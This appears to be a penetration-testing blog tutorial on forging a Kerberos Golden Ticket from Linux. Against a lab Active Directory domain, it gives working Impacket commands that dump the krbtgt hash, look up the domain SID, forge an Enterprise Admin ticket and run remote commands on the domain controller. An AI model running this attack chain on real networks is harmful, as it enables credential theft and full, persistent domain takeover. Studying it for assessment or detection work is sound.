Amit Agarwal Linux Blog

Golden Ticket Attack: Exploiting Kerberos from Linux

2025-10-30 3 min read Cybersecurity Penetration Testing Windows Exploitation

Introduction

Golden Ticket attacks enable complete and stealthy control over Active Directory (AD) domains by abusing Kerberos authentication. While traditionally executed from Windows, robust open-source Linux tooling—especially Impacket—makes this attack highly accessible on Unix-like systems. This guide details each critical phase, from hash extraction to ticket abuse, using field-tested commands for maximum reliability.

What is a Golden Ticket Attack?

Golden Ticket is a Kerberos exploit where attackers forge Ticket Granting Tickets (TGTs) using the AD Kerberos Ticket Granting Service (krbtgt) account’s NTLM hash. This grants attackers unfettered, persistent access to any AD resource, effectively bypassing most detection and mitigation protocols.

  • Prerequisites:
    • Domain admin-level access (krbtgt hash required)
    • Reachable target AD controller
    • Linux host with Impacket installed

Conditions

  • Lab domain : lab.local
  • DC: dc01 / 192.168.198.10
  • Lab network: 192.168.198.0/24

Extracting Credentials and Domain SID

Start by dumping necessary hashes and discovering the domain SID.

Dumping Hashes with impacket-secretsdump

The krbtgt hash is vital for forging a legitimate TGT. Use secretsdump to extract it:

1

impacket-secretsdump lab.local/administrator@lab.local > secretsdump

Find the krbtgt line in the output and copy the NTLM hash.

Retrieving the Domain SID

Kerberos tickets require the correct domain Security Identifier (SID). Obtain it using lookupsid:

1

impacket-lookupsid 'administrator:Pa$$w0rd!'@lab.local > lookupSid

Copy the domain SID string (e.g., S-1-5-21-3129320692-2127993854-1865768362) from the output.

Forging the Golden Ticket

With the krbtgt hash and the domain SID, generate the forged ticket using impacket-ticketer.

1
2
3
4
5
6
7
8
9

impacket-ticketer \
  -domain lab.local \
  -domain-sid S-1-5-21-3129320692-2127993854-1865768362 \
  -extra-sid S-1-5-21-3129320692-2127993854-1865768362-519 \
  -dc-ip 192.168.198.10 \
  -user Administrator \
  -password 'Pa$$w0rd!' \
  -aesKey fe1092735e93831448b0b917c94a76d9b713734f030aac3babe86775e591eace \
  Administrator

Here, the values mean the following

Value details
S-1-5-21-3129320692-2127993854-1865768362 Domain SID
S-1-5-21-3129320692-2127993854-1865768362-519 Domain Enterprise Admin
192.168.198.10 Domain Controller IP
fe1092735e93831448b0b917c94a76d9b713734f030aac3babe86775e591eace AES key for krbtgt account

This command forges a Kerberos TGT as the Administrator user with full domain privileges. Adjust the AES key and arguments as necessary per your recon.

Using the Golden Ticket

To leverage this forged ticket, set the Kerberos cache environment variable and execute remote commands:

1

KRB5CCNAME=Administrator.ccache python3 /usr/share/doc/python3-impacket/examples/wmiexec.py -no-pass -k lab.local/administrator@dc01.lab.local

Always use the domain controller’s exact hostname (e.g., dc01.lab.local). FQDNs or IP addresses typically fail for Kerberos authentication.

Conclusion

Golden Ticket attacks remain one of the most powerful tools for AD exploitation—privilege, persistence, and stealth in a single operation. With high-fidelity Linux tooling like Impacket, red teamers and attackers can perform the entire attack chain from non-Windows systems. Defenders must monitor for Kerberos anomalies, audit krbtgt hash changes, and ensure rapid detection of unauthorized TGT issuance.

Mastering this workflow is indispensable for anyone assessing Active Directory environments or building modern blue-team detection capabilities.

Cybersecurity Kerberos Active Directory Red Teaming Linux Impacket
comments powered by Disqus
© 2018 - 2025 by Amit Agarwal
Bilberry Hugo Theme